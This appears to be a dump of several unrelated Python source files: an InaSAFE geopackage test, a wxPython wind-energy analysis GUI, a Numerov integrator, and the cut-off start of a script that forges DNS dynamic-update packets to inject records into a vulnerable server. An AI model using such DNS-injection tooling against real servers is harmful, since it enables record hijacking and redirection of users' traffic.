        self.assertIsNone(data_store.layer_uri('fake_layer'))
        # Test to add a raster
        layer_name = 'raster_flood'
        layer = standard_data_path('hazard', 'classified_hazard.tif')
        raster_layer = QgsRasterLayer(layer, layer_name)
        result = data_store.add_layer(raster_layer, layer_name)
        self.assertTrue(result[0])
        # We should have 3 layers inside.
        layers = data_store.layers()
        self.assertEqual(len(layers), 3)
        # Check the URI for the raster layer.
        expected = 'GPKG:' + path.absoluteFilePath() + ':' + layer_name
        self.assertEqual(data_store.layer_uri(layer_name), expected)
        # Add a second raster.
        layer_name = 'big raster flood'
        # NOTE(review): add_layer() returns a tuple elsewhere in this test,
        # so assertTrue on the tuple always passes; result[0] would be the
        # stricter check.
        self.assertTrue(data_store.add_layer(raster_layer, layer_name))
        self.assertEqual(len(data_store.layers()), 4)
        # Test layer without geometry
        layer = load_test_vector_layer(
            'gisv4', 'impacts', 'exposure_summary_table.csv')
        tabular_layer_name = 'breakdown'
        result = data_store.add_layer(layer, tabular_layer_name)
        self.assertTrue(result[0])
    @unittest.skipIf(
        int(gdal.VersionInfo('VERSION_NUM')) < 2000000,
        'GDAL 2.0 is required for geopackage.')
    @expect_failure_in_windows(AssertionError)
    def test_read_existing_geopackage(self):
        """Test we can read an existing geopackage."""
        path = standard_data_path('other', 'jakarta.gpkg')
        import os
        path = os.path.normpath(os.path.normcase(os.path.abspath(path)))
        geopackage = QFileInfo(path)
        data_store = GeoPackage(geopackage)
        # We should have 3 layers in this geopackage.
        self.assertEqual(len(data_store.layers()), 3)
        # Test we can load a vector layer.
        roads = QgsVectorLayer(
            data_store.layer_uri('roads'),
            'Test',
            'ogr'
        )
        self.assertTrue(roads.isValid())
        # Test we can load a raster layers.
        # This currently fails on windows...
        # So we have decorated it with expected fail on windows
        # Should pass on other platforms.
        path = data_store.layer_uri('flood')
        flood = QgsRasterLayer(path, 'flood')
        self.assertTrue(flood.isValid())
if __name__ == '__main__':
unittest.main()
| Gustry/inasafe | safe/datastore/test/test_geopackage.py | Python | gpl-3.0 | 5,299 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
################################################################################
# gwindetk.py #
# #
# Part of UMass Amherst's Wind Energy Engineering Toolbox of Mini-Codes #
# (or Mini-Codes for short) #
# #
# Python code by Alec Koumjian - akoumjian@gmail.com #
# #
# This code adapted from the original Visual Basic code at #
# http://www.ceere.org/rerl/projects/software/mini-code-overview.html #
# #
# These tools can be used in conjunction with the textbook #
# "Wind Energy Explained" by J.F. Manwell, J.G. McGowan and A.L. Rogers #
# http://www.ceere.org/rerl/rerl_windenergytext.html #
# #
################################################################################
# Copyright 2009 Alec Koumjian #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
import wxversion
wxversion.select('2.8')
import wx
import wx.lib.intctrl as intctrl
import wxmpl
import os
import analysis
import synthesis
import file_ops
class MyFrame(wx.Frame):
    def __init__(self, *args, **kwds):
        """Build the main frame: fixed 800x600 size, widget creation,
        layout, event bindings, and an initial sync of the timeseries
        list box."""
        # begin wxGlade: MyFrame.__init__
        kwds["size"] = (800, 600)
        kwds["style"] = wx.DEFAULT_FRAME_STYLE
        wx.Frame.__init__(self, *args, **kwds)
        # Timeseries currently loaded into the tool (presumably keyed
        # by name -- confirm against the load/import code).
        self.active_timeseries = {}
        self.__create_objects()
        self.__set_properties()
        self.__do_layout()
        self.__set_bindings()
        self.sync_active_listbox()
def __create_objects(self):
# Menu Bar
self.frame_1_menubar = wx.MenuBar()
# File menu
self.file_menu = wx.Menu()
self.import_file = wx.MenuItem(self.file_menu, -1, "Import", "Import timeseries from data file")
self.file_menu.AppendItem(self.import_file)
self.frame_1_menubar.Append(self.file_menu, "File")
# Help Menu
self.help_menu = wx.Menu()
self.help_book = wx.MenuItem(self.help_menu, -1, "Help Index", "How to use this software.")
self.about = wx.MenuItem(self.help_menu, -1, "About","About this software.")
self.help_menu.AppendItem(self.about)
self.frame_1_menubar.Append(self.help_menu, "Help")
# Set Menu Bar
self.SetMenuBar(self.frame_1_menubar)
# Menu Bar end
# Status Bar
self.frame_1_statusbar = self.CreateStatusBar(1, 0)
# Status Bar end
# Tool Bar
self.frame_1_toolbar = wx.ToolBar(self, -1, style=wx.TB_HORIZONTAL|wx.TB_3DBUTTONS)
self.SetToolBar(self.frame_1_toolbar)
self.frame_1_toolbar.AddLabelTool(wx.NewId(), "new", wx.Bitmap("stock_new.png", wx.BITMAP_TYPE_ANY), wx.NullBitmap, wx.ITEM_NORMAL, "", "")
self.frame_1_toolbar.AddLabelTool(wx.NewId(), "open", wx.Bitmap("stock_open.png", wx.BITMAP_TYPE_ANY), wx.NullBitmap, wx.ITEM_NORMAL, "", "")
self.frame_1_toolbar.AddLabelTool(wx.NewId(), "save", wx.Bitmap("stock_save.png", wx.BITMAP_TYPE_ANY), wx.NullBitmap, wx.ITEM_NORMAL, "", "")
self.frame_1_toolbar.AddLabelTool(wx.NewId(), "exit", wx.Bitmap("stock_exit.png", wx.BITMAP_TYPE_ANY), wx.NullBitmap, wx.ITEM_NORMAL, "", "")
# Tool Bar end
# Top level sizers
self.sizer_1 = wx.BoxSizer(wx.HORIZONTAL)
self.sizer_3 = wx.BoxSizer(wx.VERTICAL)
# Splitter
self.splitter = wx.SplitterWindow(self, -1, style=wx.SP_3DSASH|wx.SP_3DBORDER)
# TS panel widgets
self.sizer_ts = wx.BoxSizer(wx.VERTICAL)
self.sizer_control_ts = wx.BoxSizer(wx.HORIZONTAL)
self.ts_control_panel = wx.Panel(self.splitter, -1)
self.list_box_1 = wx.ListBox(self.ts_control_panel, -1, choices=[], style=wx.LB_MULTIPLE|wx.LB_NEEDED_SB)
self.ts_plot_button = wx.Button(self.ts_control_panel, -1, 'Plot Timeseries')
self.ts_remove_button = wx.Button(self.ts_control_panel, -1, 'Remove')
# Notebook
self.notebook_1 = wx.Notebook(self.splitter, -1, style=wx.NB_LEFT)
self.notebook_1_pane_1 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_2 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_3 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_4 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_5 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_6 = wx.Panel(self.notebook_1, -1)
# Text results panel
self.results_panel = wx.Panel(self, -1, style=wx.SIMPLE_BORDER)
self.results_panel_text = wx.StaticText(self.results_panel, -1, label="Numerical Results Here")
# Graphing panel
self.plot_panel = wxmpl.PlotPanel(self, -1)
# Analysis widgets
self.analysis_sizer = wx.BoxSizer(wx.VERTICAL)
self.stat_button = wx.Button(self.notebook_1_pane_1, -1, 'Statistics')
self.hist_button = wx.Button(self.notebook_1_pane_1, -1, 'Histogram')
self.weibull_button = wx.Button(self.notebook_1_pane_1, -1, 'Weibull Params')
self.corr_button = wx.Button(self.notebook_1_pane_1, -1, 'Correlate')
self.corr_panel = wx.Panel(self.notebook_1_pane_1, -1, style=wx.RAISED_BORDER)
self.corr_panel_btn = wx.Button(self.notebook_1_pane_1, -1, '>>', name='corr')
self.corr_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.rad_autocorr = wx.RadioButton(self.corr_panel, -1, 'Auto', style=wx.RB_GROUP)
self.rad_crosscorr = wx.RadioButton(self.corr_panel, -1, 'Cross')
self.corr_lag_int = intctrl.IntCtrl(self.corr_panel, -1, value=15, min=0)
self.lag_label = wx.StaticText(self.corr_panel, -1, 'No. lags')
self.block_button = wx.Button(self.notebook_1_pane_1, -1, 'Block Average')
self.block_panel = wx.Panel(self.notebook_1_pane_1, -1, style=wx.RAISED_BORDER)
self.block_panel_btn = wx.Button(self.notebook_1_pane_1, -1, '>>', name='block')
self.block_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.block_new_freq = wx.Choice(self.block_panel, -1, choices=['YEARLY','QUARTERLY','MONTHLY','WEEKLY','DAILY','HOURLY','MINUTELY'])
self.psd_button = wx.Button(self.notebook_1_pane_1, -1, 'Power Spectral Density')
# End Analysis widgets
# Synthesis widgets
self.synthesis_sizer = wx.BoxSizer(wx.VERTICAL)
self.arma_button = wx.Button(self.notebook_1_pane_2, -1, 'ARMA')
self.arma_panel = wx.Panel(self.notebook_1_pane_2, -1, style=wx.RAISED_BORDER)
self.arma_panel_btn = wx.Button(self.notebook_1_pane_2, -1, '>>', name='arma')
self.arma_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.mean_lbl = wx.StaticText(self.arma_panel, -1, 'Mean:')
self.stdev_lbl = wx.StaticText(self.arma_panel, -1, 'STDEV:')
self.npoints_lbl = wx.StaticText(self.arma_panel, -1, 'No. points:')
self.autocorr_lbl = wx.StaticText(self.arma_panel, -1, 'Autocorr:')
self.mean_ctrl = wx.TextCtrl(self.arma_panel, -1, '')
self.stdev_ctrl = wx.TextCtrl(self.arma_panel, -1, '')
self.npoints_ctrl = wx.TextCtrl(self.arma_panel, -1, '')
self.autocorr_ctrl = wx.TextCtrl(self.arma_panel, -1, '')
# End Synthesis widgets
# Aerodyn widgets
# End Aerodyn widgets
# Mechanics widgets
# End Mechanics widgets
def __set_properties(self):
# begin wxGlade: MyFrame.__set_properties
self.SetTitle("Wind Energy Engineering Toolkit")
_icon = wx.EmptyIcon()
_icon.CopyFromBitmap(wx.Bitmap("wec.ico", wx.BITMAP_TYPE_ANY))
self.SetIcon(_icon)
self.frame_1_statusbar.SetStatusWidths([-1])
# statusbar fields
frame_1_statusbar_fields = ["The Minicodes at your service!"]
for i in range(len(frame_1_statusbar_fields)):
self.frame_1_statusbar.SetStatusText(frame_1_statusbar_fields[i], i)
self.frame_1_toolbar.Realize()
    def __do_layout(self):
        """Arrange all widgets: notebook pages, the collapsible option
        panels, the timeseries list/splitter, and the plot/results column.

        NOTE(review): many widgets are positioned with absolute Move/SetSize
        calls inside raised-border panels rather than sizers, so statement
        order and pixel values here are load-bearing.
        """
        # begin wxGlade: MyFrame.__do_layout
        # Graph/plot panel
        self.plot_panel.SetMinSize((50,50))
        # Results panel
        self.results_panel_text.Move((20,10))
        # Add Notebook pages
        self.notebook_1.AddPage(self.notebook_1_pane_1, "Analysis")
        self.notebook_1.AddPage(self.notebook_1_pane_2, "Synthesis")
        self.notebook_1.AddPage(self.notebook_1_pane_3, "Rotor")
        self.notebook_1.AddPage(self.notebook_1_pane_4, "Electrical")
        self.notebook_1.AddPage(self.notebook_1_pane_5, "Dynamics")
        self.notebook_1.AddPage(self.notebook_1_pane_6, "System")
        # Analysis layout
        self.corr_sizer.Add(self.corr_button,1)
        self.corr_sizer.Add(self.corr_panel_btn,0)
        self.block_sizer.Add(self.block_button,1)
        self.block_sizer.Add(self.block_panel_btn,0)
        self.analysis_sizer.AddMany(((self.stat_button),(self.hist_button),
                                     (self.weibull_button),(self.corr_sizer),
                                     (self.corr_panel),
                                     (self.block_sizer),(self.block_panel),
                                     (self.psd_button)))
        button_size = (180,30)
        self.stat_button.SetMinSize(button_size)
        self.hist_button.SetMinSize(button_size)
        self.weibull_button.SetMinSize(button_size)
        ## corr panel layout
        self.corr_button.SetMinSize(button_size)
        self.corr_panel_btn.SetMinSize((40,30))
        # Option panels start collapsed; OnTogglePanelButton shows them.
        self.corr_panel.Hide()
        self.rad_autocorr.Move((10,3))
        self.rad_crosscorr.Move((75,3))
        self.lag_label.Move((150,5))
        self.corr_lag_int.Move((210,0))
        self.corr_lag_int.SetSize((40,-1))
        self.notebook_1_pane_1.SetSizer(self.analysis_sizer)
        ## / corr panel layout
        ## block panel
        self.block_button.SetMinSize(button_size)
        self.block_panel_btn.SetMinSize((40,30))
#        self.block_new_freq.SetMinSize((50, -1))
        self.block_new_freq.Move((30,0))
#        self.block_new_freq.SetSize((60,-1))
        self.block_panel.Hide()
        ## / block panel
        self.psd_button.SetMinSize(button_size)
        # End Analysis layout
        # Synthesis Layout
        self.arma_sizer.Add(self.arma_button,1)
        self.arma_sizer.Add(self.arma_panel_btn,0)
        self.synthesis_sizer.AddMany(((self.arma_sizer),(self.arma_panel)))
        self.arma_button.SetMinSize(button_size)
        self.arma_panel_btn.SetMinSize((40,30))
        self.arma_panel.Hide()
        self.mean_lbl.Move((10,10))
        self.stdev_lbl.Move((60,10))
        self.npoints_lbl.Move((110,10))
        self.autocorr_lbl.Move((190, 10))
        self.mean_ctrl.SetSize((30,-1))
        self.stdev_ctrl.SetSize((30,-1))
        self.npoints_ctrl.SetSize((30,-1))
        self.autocorr_ctrl.SetSize((30,-1))
        self.mean_ctrl.Move((10,30))
        self.stdev_ctrl.Move((60,30))
        self.npoints_ctrl.Move((110,30))
        self.autocorr_ctrl.Move((190,30))
        self.arma_button.Move((10,60))
        self.notebook_1_pane_2.SetSizer(self.synthesis_sizer)
        # End Synthesis Layout
        # TS panel
        self.sizer_ts.Add(self.list_box_1, 1, wx.EXPAND, 0)
        self.sizer_ts.Add(self.sizer_control_ts, 0)
        self.sizer_control_ts.Add(self.ts_plot_button, 0)
        self.sizer_control_ts.Add(self.ts_remove_button, 0)
        self.ts_control_panel.SetSizer(self.sizer_ts)
        # Splitter layout
        self.splitter.SetMinimumPaneSize(50)
        # Negative sash position measures from the bottom of the window.
        self.splitter.SplitHorizontally(self.ts_control_panel, self.notebook_1, sashPosition=-300)
        # Top level sizers
        self.sizer_3.Add(self.plot_panel, 1, wx.EXPAND, 1)
        self.sizer_3.Add(self.results_panel, 1, wx.EXPAND, 0)
        self.sizer_1.Add(self.splitter, 1, wx.EXPAND)
        self.sizer_1.Add(self.sizer_3, 1, wx.EXPAND, 0)
        self.SetSizer(self.sizer_1)
        self.Layout()
    def __set_bindings(self):
        """Bind menu and button events to their On* handler methods.

        Every widget bound here is created in __create_objects; the three
        panel toggle buttons share a single handler that dispatches on the
        button's wx name attribute.
        """
        # Menu Operations
        self.Bind(wx.EVT_MENU, self.OnImport, self.import_file)
        self.Bind(wx.EVT_MENU, self.OnAboutBox, self.about)
        self.Bind(wx.EVT_MENU, self.OnHelpIndex, self.help_book)
        # End File Operations
        # TS Panel Bindings
        self.Bind(wx.EVT_BUTTON, self.OnPlotTSButton, self.ts_plot_button)
        self.Bind(wx.EVT_BUTTON, self.OnRemoveTSButton, self.ts_remove_button)
        # Analysis
        self.Bind(wx.EVT_BUTTON, self.OnStatButton, self.stat_button)
        self.Bind(wx.EVT_BUTTON, self.OnHistButton, self.hist_button)
        self.Bind(wx.EVT_BUTTON, self.OnWeibullButton, self.weibull_button)
        self.Bind(wx.EVT_BUTTON, self.OnCorrButton, self.corr_button)
        self.Bind(wx.EVT_BUTTON, self.OnBlockButton, self.block_button)
        self.Bind(wx.EVT_BUTTON, self.OnPSDButton, self.psd_button)
        self.Bind(wx.EVT_BUTTON, self.OnTogglePanelButton, self.corr_panel_btn)
        self.Bind(wx.EVT_BUTTON, self.OnTogglePanelButton, self.block_panel_btn)
        # End Analysis
        # Synthesis
        self.Bind(wx.EVT_BUTTON, self.OnARMAButton, self.arma_button)
        self.Bind(wx.EVT_BUTTON, self.OnTogglePanelButton, self.arma_panel_btn)
    # Utility functions
def valid_selections(self, allowed_number):
"""
Checks number of selections in self.list_box_1
Input: allowed_number (int) is number of allowed selections
Output: MsgDialog if incorrect number, else passes returns True
"""
index = self.list_box_1.GetSelections()
message = "Please select exactly %s timeseries"
if len(index) != allowed_number:
dlg = wx.MessageDialog(self, message % (allowed_number), "Invalid Input", wx.OK)
dlg.ShowModal()
dlg.Destroy()
return False
else:
return True
def renumber_active_timeseries(self):
"""Renumber timeseries in active_timeseries dictionary."""
index = 0
new_dict = {}
for key, value in self.active_timeseries.iteritems():
new_dict[index] = value
index += 1
self.active_timeseries = new_dict
def sync_active_listbox(self):
"""Synchronize listbox to active_timeseries values."""
self.list_box_1.Clear()
string_list = []
## Add text to listbox
for index, value in self.active_timeseries.iteritems():
string_list.append(' '.join([str(index),str(value['name']),str(value['location']),str(value['timeseries'][0:3])]))
self.list_box_1.Set(string_list)
    def refresh_timeseries(self):
        """Renumber and sync active ts to listbox."""
        # Keep the dict keys contiguous first, then mirror them in the UI.
        self.renumber_active_timeseries()
        self.sync_active_listbox()
    def add_timeseries(self, timeseries_dict):
        """Add a timeseries dictionary (metadata + ts) to active_timeseries"""
        # Keys are assumed contiguous 0..n-1, so len() is the next free
        # index; removals must be followed by refresh_timeseries() to keep
        # this invariant true.
        self.active_timeseries[len(self.active_timeseries)] = timeseries_dict
    def remove_timeseries(self, index):
        """Remove timeseries from active list"""
        # Raises KeyError for an unknown index; callers should invoke
        # refresh_timeseries() afterwards to close the numbering gap.
        self.active_timeseries.pop(index)
def create_ts_dict(self, new_ts, old_ts_dict=False, prepend_str=''):
"""
Place new timeseries inside meta_ts_dict, copy meta if applicable.
Input: new timeseries
Optional: old timeseries for meta_data, prepend string
Output: new meta + ts dictionary
"""
if old_ts_dict:
new_ts_dict = old_ts_dict.copy()
new_ts_dict['timeseries'] = new_ts
new_ts_dict['name'] = prepend_str+old_ts_dict['name']
else:
new_ts_dict = {'elevation': 00, 'name': '',
'designation': 'primary', 'collector': 'synthetic','filters': {},
'comments': 'Generated with Wind Energy Engineering Toolkit',
'meters_above_ground': 0, 'site_name': 'None', 'coords': {},
'location': 'none', 'time_step': 600, 'units': 'units',
'timezone': 0, 'time_period': '','logger_sampling': 0,
'type': 'synthetic', 'report_created': '2001-01-01'}
new_ts_dict['timeseries'] = new_ts
new_ts_dict['name'] = prepend_str+'synthetic'
return new_ts_dict
# End Utility functions
# Handler functions
## Menu Operations
def OnImport(self, event):
"""Import all timeseries from a *.dat file"""
dlg = wx.FileDialog(self, "Choose a file", os.getcwd(), "", "Dat files|*.dat|Any files|*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
open_file = open(dlg.GetPath(), 'rb')
meta_ts_dict = file_ops.parse_file(open_file)
open_file.close()
for meta_ts in meta_ts_dict.values():
self.add_timeseries(meta_ts)
self.refresh_timeseries()
# Set statusbar text
mypath = os.path.basename(dlg.GetPath())
self.SetStatusText("You imported: %s" % mypath)
    def OnHelpIndex(self, event):
        """Placeholder for Help -> Help Index; not yet implemented."""
        return 0
def OnAboutBox(self, event):
description = """The Wind Energy Engineering Toolkit (aka Minicodes) is a set of functions designed to..."""
licence = """Wind Energy Engineering Toolkit is free software; you can redistribute it and/or modify it under the terms of the
GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version.
Wind Energy Engineering Toolkit is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details. You should have received a copy of the
GNU General Public License along with Wind Energy Engineering Toolkit;
if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA"""
info = wx.AboutDialogInfo()
info.SetIcon(wx.Icon('/home/aleck/Code/minicodes/sandbox/wec.ico', wx.BITMAP_TYPE_ICO))
info.SetName('Wind Energy Engineering Toolkit')
info.SetVersion('0.1')
info.SetDescription(description)
info.SetCopyright('(C) 2009 Alec Koumjian')
info.SetWebSite('http://www.umass.edu/windenergy/projects/software/mini-code-overview.html')
info.SetLicence(licence)
info.AddDeveloper('Alec Koumjian')
info.AddDocWriter('Alec Koumjian')
info.AddArtist('Alec Koumjian')
# info.AddTranslator('jan bodnar')
wx.AboutBox(info)
## End Menu Operations
## TS Panel Functions
def OnPlotTSButton(self, event):
"""Plot a timeseries object using matplotlib."""
index = self.list_box_1.GetSelections()
fig = self.plot_panel.get_figure()
fig.clear()
axes = fig.gca()
# Draw grids
axes.grid(b=True)
# Plot selected timeseries
for selection in range(len(index)):
axes.plot(self.active_timeseries[index[selection]]['timeseries'].dates.tolist(), self.active_timeseries[index[selection]]['timeseries'], linestyle='-', marker='o', linewidth=1.0)
axes.xaxis_date(tz=None)
## Draw plot
self.plot_panel.draw()
def OnRemoveTSButton(self, event):
"""Remove selected timeseries from the active list and listbox."""
indexes = self.list_box_1.GetSelections()
for index in indexes:
self.remove_timeseries(index)
self.refresh_timeseries()
## General events
def OnTogglePanelButton(self, event):
"""Hide or show a panel when toggle button is pressed."""
btn_panel_table = {'corr':self.corr_panel,'block':self.block_panel,
'arma':self.arma_panel}
name = event.GetEventObject().GetName()
panel = btn_panel_table[name]
if panel.IsShown():
panel.Hide()
event.GetEventObject().SetLabel('>>')
else:
event.GetEventObject().SetLabel('<<')
panel.Show()
panel.GetParent().Layout()
## Analysis Functions
def OnStatButton(self, event):
"""Generate statistics and print to panel."""
index = self.list_box_1.GetSelections()
if self.valid_selections(1):
# Fetch timeseries from dictionary
ts = self.active_timeseries[index[0]]['timeseries']
# Fetch ts name from dictionary
name = self.active_timeseries[index[0]]['name']
# Set statusbar message
self.frame_1_statusbar.SetStatusText("Stats for "+str(name))
# Collect stats of timeseries
stats = analysis.get_statistics(ts.compressed())
# Create statictext string
text = ""
for field, value in stats.iteritems():
text = ''.join(text+str(field)+": "+str(value)+"\n")
self.results_panel_text.SetLabel(text)
    def OnHistButton(self, event):
        """Generate histogram data for the selected timeseries and draw it
        as a bar chart in the plot panel."""
        index = self.list_box_1.GetSelections()
        if self.valid_selections(1):
            # Fetch timeseries from dictionary
            ts = self.active_timeseries[index[0]]['timeseries']
            # Fetch ts name from dictionary
            name = self.active_timeseries[index[0]]['name']
            ## TODO, add bins field (bin count is hard-coded for now)
            bins = 10
            # Set statusbar message
            self.frame_1_statusbar.SetStatusText("Histogram for "+str(name))
            fig = self.plot_panel.get_figure()
            # Clear old data
            fig.clear()
            axes = fig.gca()
            # Generate histogram data
            hist_values, bin_edges = analysis.get_histogram_data(ts.compressed(), bins)
            # Create bar graph from histogram data
            # Note: We do not use Matplotlib's axes.hist function
            # for the sake of consistency. We always generate the data
            # Using Numpy's library and then generate a bar graph from it
            # Produces identical results to matplotlib.axes.hist
            histogram = axes.bar(bin_edges[:-1], hist_values, width=bin_edges[1]-bin_edges[0])
            axes.set_xlabel('Wind Speed')
            axes.set_ylabel('P(x)')
            axes.set_title('Histogram of %s' % (name))
            # Redraw graph
            self.plot_panel.draw()
def OnWeibullButton(self, event):
"""Retrieve Weibull parameters from selected timeseries."""
index = self.list_box_1.GetSelections()
if self.valid_selections(1):
# Fetch timeseries from dictionary
ts = self.active_timeseries[index[0]]['timeseries']
# Fetch ts name from dictionary
name = self.active_timeseries[index[0]]['name']
# Set statusbar message
self.frame_1_statusbar.SetStatusText("Weibull Parameters for "+str(name))
# Collect stats of timeseries
stats = analysis.get_statistics(ts.compressed())
c, k = analysis.get_weibull_params(stats['mean'],stats['std'])
# Create statictext string
text = "C: "+str(c)+"\n"+"K: "+str(k)+"\n"
self.results_panel_text.SetLabel(text)
def OnCorrButton(self, event):
"""Generate and plot correlation values."""
if self.rad_autocorr.GetValue():
self.OnAutocorrButton(event)
else:
self.OnCrosscorrButton(event)
    def OnAutocorrButton(self, event):
        """Compute autocorrelation of the selected timeseries up to the
        user-chosen number of lags and plot it."""
        index = self.list_box_1.GetSelections()
        if self.valid_selections(1):
            # Fetch timeseries from dictionary
            ts = self.active_timeseries[index[0]]['timeseries']
            # Fetch ts name from dictionary
            name = self.active_timeseries[index[0]]['name']
            # Get lag value from the options panel IntCtrl
            max_lag_increment = self.corr_lag_int.GetValue()
            # Set statusbar message
            self.frame_1_statusbar.SetStatusText("Autocorrelation values for "+str(name))
            # Collect autocorrelation values of timeseries
            lag_values, autocorrelation_values = analysis.autocorrelate(ts.compressed(), max_lag_increment)
            # Get Figure
            fig = self.plot_panel.get_figure()
            # Clear old data
            fig.clear()
            axes = fig.gca()
            # Draw grids
            axes.grid(b=True)
            # Draw line at y=0 (zero-correlation reference)
            axes.axhline(linewidth=2, color='r')
            # Draw autocorrelation values
            axes.plot(lag_values, autocorrelation_values, linestyle='-', marker='o', linewidth=1.0)
            # Set labels
            axes.set_xlabel('Lag')
            axes.set_ylabel('Autocorr')
            axes.set_title('Autocorrelation of %s' % (name))
            # Redraw graph
            self.plot_panel.draw()
    def OnCrosscorrButton(self, event):
        """Compute cross-correlation of the two selected timeseries up to
        the user-chosen number of lags and plot it."""
        index = self.list_box_1.GetSelections()
        if self.valid_selections(2):
            # Fetch ts1 from dictionary
            ts1 = self.active_timeseries[index[0]]['timeseries']
            # Fetch ts1 name from dictionary
            name1 = self.active_timeseries[index[0]]['name']
            # Fetch ts2 from dictionary
            ts2 = self.active_timeseries[index[1]]['timeseries']
            # Fetch ts2 name from dictionary
            name2 = self.active_timeseries[index[1]]['name']
            # Get lag value from the options panel IntCtrl
            max_lag_increment = self.corr_lag_int.GetValue()
            # Set statusbar message
            self.frame_1_statusbar.SetStatusText("Crosscorrelation values for "+str(name1)+" and "+str(name2))
            # Collect crosscorrelation values of the two timeseries
            lag_values, crosscorrelation_values = analysis.crosscorrelate(ts1.compressed(),ts2.compressed(), max_lag_increment)
            # Get Figure
            fig = self.plot_panel.get_figure()
            # Clear old data
            fig.clear()
            axes = fig.gca()
            axes.grid(b=True)
            # Draw line at y=0 (zero-correlation reference)
            axes.axhline(linewidth=2, color='r')
            # Plot correlation values
            axes.plot(lag_values, crosscorrelation_values, linestyle='-', marker='o', linewidth=1.0)
            axes.set_xlabel('Lag')
            axes.set_ylabel('Crosscorr')
            axes.set_title('Crosscorrelation of %s and %s' % (name1,name2))
            # Redraw graph
            self.plot_panel.draw()
    def OnBlockButton(self, event):
        """Create block average of selected timeseries and add to list_box_1

        The new averaging frequency comes from the block_new_freq choice
        widget; the derived series inherits the source's metadata with a
        descriptive name prefix.
        """
        index = self.list_box_1.GetSelections()
        if self.valid_selections(1):
            old_ts_dict = self.active_timeseries[index[0]]
            new_freq = str(self.block_new_freq.GetString(self.block_new_freq.GetSelection()))
            # Set statusbar message
            self.frame_1_statusbar.SetStatusText("Created block average of "+str(self.active_timeseries[index[0]]['name']+" with new frequency "+new_freq))
            # Create new timeseries
            new_timeseries = analysis.block_average(old_ts_dict['timeseries'].compressed(), new_freq)
            new_ts_dict = self.create_ts_dict(new_timeseries, old_ts_dict, new_freq+'_block_avg_of_')
            self.add_timeseries(new_ts_dict)
            self.refresh_timeseries()
            # Set focus and highlight the newly appended (last) row
            self.list_box_1.SetFocus()
            self.list_box_1.SetSelection(len(self.active_timeseries)-1)
    def OnPSDButton(self, event):
        """Generate power spectral density info and plot using matplotlib."""
        # Not yet implemented; placeholder return value.
        return 0
    ## End Analysis Functions
def OnARMAButton(self, event):
"""
Generate timeseries using autoregressive moving average method.
Input: mean, stdev, npoints, autocorr (all from gui inputs)
Output: Add generated timeseries to self.list_box_1
"""
mean = float(self.mean_ctrl.GetValue())
stdev = float(self.stdev_ctrl.GetValue())
npoints = int(self.npoints_ctrl.GetValue())
autocorr = float(self.autocorr_ctrl.GetValue())
arma_ts = synthesis.gen_arma(mean, stdev, autocorr, npoints)
new_ts_dict = self.create_ts_dict(arma_ts, prepend_str='arma_')
self.add_timeseries(new_ts_dict)
self.refresh_timeseries()
## End Synthesis Functions
# End Handler Functions
# end of class MyFrame
if __name__ == "__main__":
    # Create the wx application, show the main frame and enter the event
    # loop; MainLoop() blocks until the window is closed.
    app = wx.PySimpleApp(0)
    wx.InitAllImageHandlers()
    frame_1 = MyFrame(None, -1, "")
    app.SetTopWindow(frame_1)
    frame_1.Show()
    app.MainLoop()
| kmonsoor/windenergytk | windenergytk/gwindtk.py | Python | gpl-3.0 | 30,991 |
import numpy
def numerov_integration(domain, a, f0, f1):
    """Integrate an ODE of the form f''(x) = a(x) * f(x) with the Numerov
    three-point recursion.

    domain -- grid object: len(domain) is the number of points and
              domain.step the spacing (assumed uniform -- TODO confirm)
    a      -- sequence of a(x) sampled on the same grid points
    f0, f1 -- values of f at the first two grid points (seed the recursion)

    Returns a complex numpy array holding f on the whole grid.
    """
    # builtin `complex`: the numpy.complex alias was removed in NumPy 1.24
    # and raised AttributeError there.
    f = numpy.zeros(len(domain), dtype=complex)
    f[0] = f0
    f[1] = f1
    step = domain.step
    h2 = step**2  # loop-invariant, hoisted
    for i in range(2, len(domain)):
        phi_i1 = f[i-1] * (2.0 + 5.0 * h2 * a[i-1] / 6.0)
        phi_i2 = f[i-2] * (1.0 - h2 * a[i-2] / 12.0)
        f[i] = (phi_i1 - phi_i2) / (1.0 - h2 * a[i] / 12.0)
    return f
| frapa/Schr | windows/compy/numerov.py | Python | gpl-3.0 | 414 |
#!/usr/bin/env python
# by Chris Truncer
# Script to attempt to forge a packet that will inject a new value
# for a dns record. Check nessus plugin #35372
# Some great documentation and sample code came from:
# http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py
import argparse
import logging
# I know it's bad practice to add code up here, but it's the only way I could
# see to suppress the IPv6 warning from scapy (By setting this
# before importing scapy).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys
def add_a_record(name_server, new_dns_record, ip_value):
    """Send a DNS dynamic update (opcode 5) that adds an "A" record.

    name_server    -- address of the vulnerable DNS server
    new_dns_record -- fully qualified record name to create
    ip_value       -- IPv4 address the new record should resolve to
    Exits early with an error message if any argument is missing.
    """
    os.system('clear')
    title()
    # Verifying all required options have a populated value
    if name_server is None or new_dns_record is None or ip_value is None:
        print "[*] ERROR: You did not provide all the required command line options!"
        print "[*] ERROR: Please re-run with required options."
